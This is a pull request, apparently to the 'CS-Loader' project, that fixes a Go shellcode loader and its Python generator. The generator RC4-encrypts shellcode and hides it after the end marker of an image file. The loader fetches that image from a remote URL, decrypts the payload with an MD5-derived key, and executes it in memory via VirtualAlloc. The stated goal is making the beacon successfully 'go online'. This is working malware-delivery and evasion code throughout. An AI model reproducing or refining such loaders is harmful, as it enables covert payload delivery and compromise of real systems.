### PR TITLE
修复go版本不能上线问题

### DIFF
--- a/go版本/CS-Loader.go
+++ b/go版本/CS-Loader.go
@@ -17,6 +17,8 @@ import (
 	"unsafe"
 	"crypto/md5"
 	"encoding/hex"
+	"bytes"
+	//"fmt"
 )
 
 const (
@@ -52,16 +54,14 @@ func main()  {
 	if err != nil {
 		os.Exit(1)
 	}
-	idx := 0
-	b = []byte(b)
-	for i := 0; i < len(b); i++ {
-		if b[i] == 255 && b[i+1] == 217 {
-			break
-		}
-		idx++
+	//直接以ffd9做split，得到shellcode
+	c := bytes.Split(b,[]byte{255,217})
+	if len(c) != 2 {
+		os.Exit(1)
+		//"error load img"
 	}
-	raw := string(b[idx+2:])
-	// fmt.Print(raw)
+	raw := string(c[1])
+	//fmt.Print(raw)
 	sDec, _ := b64.StdEncoding.DecodeString(raw)
 	cipher, _ := rc4.NewCipher(rc4Key)
 	cipher.XORKeyStream(sDec, sDec)

--- a/go版本/CS-Loader.go
+++ b/go版本/CS-Loader.go
@@ -4,7 +4,7 @@
 //require: None
 //Description: load shellcode from img
 //E-mail: gality365@gmail.com
-
+// fix by yumusb
 package main
 
 import (
@@ -15,6 +15,8 @@ import (
 	"crypto/rc4"
 	"syscall"
 	"unsafe"
+	"crypto/md5"
+	"encoding/hex"
 )
 
 const (
@@ -31,11 +33,16 @@ var (
 	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
 	RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
 )
-
+func md5V(str string) string  {
+    h := md5.New()
+    h.Write([]byte(str))
+    return hex.EncodeToString(h.Sum(nil))
+}
 func main()  {
 	imageURL := "...your img url..."
-	rc4Key := []byte("...your RC4 key...")
-
+	rc4KeyPlain := "...your RC4 key..."
+	
+	rc4Key := []byte(md5V(rc4KeyPlain))
 	resp, err := http.Get(imageURL)
 	if err != nil {
 		os.Exit(1)

--- a/go版本/generator.py
+++ b/go版本/generator.py
@@ -1,6 +1,13 @@
 #!/usr/bin/env python
 # -*- coding: utf-8 -*-
-
+'''
+Descripttion: 
+Author: yumu
+Email: 2@33.al
+Date: 2021-01-14 13:55:31
+LastEditors: yumu
+LastEditTime: 2021-01-14 16:41:04
+'''
 """
 Author: Gality
 Name：generator.py
@@ -53,6 +60,11 @@ def main():
     payload = rc4(baseStr, key)
 
     f = open(imgName, 'ab+')
+    fileend = f.read()[-2:]
+    if(ord(fileend[0])!=255 and ord(fileend[0])!=217):
+        # 由于加载器中使用 \xff\xd9 进行判断文件结尾，所以不以这两个字符结尾的图片不能正常获取到shellcode的开头。
+        payload = chr(255)+chr(217) + payload
+        print("Abnormal end of file, auto add \xff\xd9")
     f.write(payload)
     f.close()
     print "Payload has been appended to %", imgName

--- a/go版本/generator.py
+++ b/go版本/generator.py
@@ -6,7 +6,7 @@ Author: yumu
 Email: 2@33.al
 Date: 2021-01-14 13:55:31
 LastEditors: yumu
-LastEditTime: 2021-01-14 16:41:04
+LastEditTime: 2021-01-15 14:37:16
 '''
 """
 Author: Gality
@@ -16,13 +16,12 @@ require: None
 Description: Generate encrypted shellcode（shellcode -> base64 -> RC4 -> base64 -> append to img）
 E-mail: gality365@gmail.com
 """
-import hashlib, base64, sys
+import hashlib, base64, sys, os
 
 '''
 config your shellcode
 '''
 shellcode = "...Input your shellcode here..."
-
 
 def rc4(text, key):
     # Use md5(key) to get 32-bit key instead raw key
@@ -47,11 +46,14 @@ def rc4(text, key):
 
 def main():
     if len(sys.argv) != 3:
-        print "Usage: python generator.py YourRC4Key imgName"
+        print("Usage: python generator.py YourRC4Key imgName")
         exit(0)
     else:
         key = sys.argv[1]
         imgName = sys.argv[2]
+        if(not os.path.exists(imgName) or os.path.getsize(imgName)<=200):
+            print("check your img param!")
+            exit(0)
 
 
     #base64encode
@@ -59,15 +61,21 @@ def main():
     #RC4 + base64encode
     payload = rc4(baseStr, key)
 
-    f = open(imgName, 'ab+')
-    fileend = f.read()[-2:]
-    if(ord(fileend[0])!=255 and ord(fileend[0])!=217):
-        # 由于加载器中使用 \xff\xd9 进行判断文件结尾，所以不以这两个字符结尾的图片不能正常获取到shellcode的开头。
-        payload = chr(255)+chr(217) + payload
-        print("Abnormal end of file, auto add \xff\xd9")
-    f.write(payload)
-    f.close()
-    print "Payload has been appended to %", imgName
+    with open(imgName, 'rb') as f:
+        img = f.read()
+        fileend = img[-2:]
+        if(ord(fileend[0])!=255 and ord(fileend[0])!=217):
+            if(img.count(chr(255)+chr(217))>0):# 不以ffd9结尾，但是内容中包含有ffd9，说明图片有误 或者已经在ffd9后追加过内容了 
+                print("Please change the img.")
+                exit(0)
+            else:
+                payload = img + chr(255)+chr(217) + payload
+                print("Abnormal end of file, auto add \xff\xd9")
+        else:
+            payload = img + payload
+        with open("shellcode_"+imgName,'wb') as f1:
+            f1.write(payload)
+    print("Payload has write to shellcode_"+imgName)
 
 if __name__ == "__main__":
     main()


### PR DESCRIPTION
1. 在生成图片流程中RC4混淆时候使用的是key的md5。但是go-loader没做md5转换https://github.com/Gality369/CS-Loader/blob/173092627a80af42fa47f4f6593f4fab92f3ffeb/go%E7%89%88%E6%9C%AC/generator.py#L22
对其进行了简单的修改。可以正常上线。  

1.  当前版本必须使用规范的图片（以ffd9结尾,loader中通过此作为判断依据截取shellcode），所以我修改成了不规范的图片自动添加ffd9。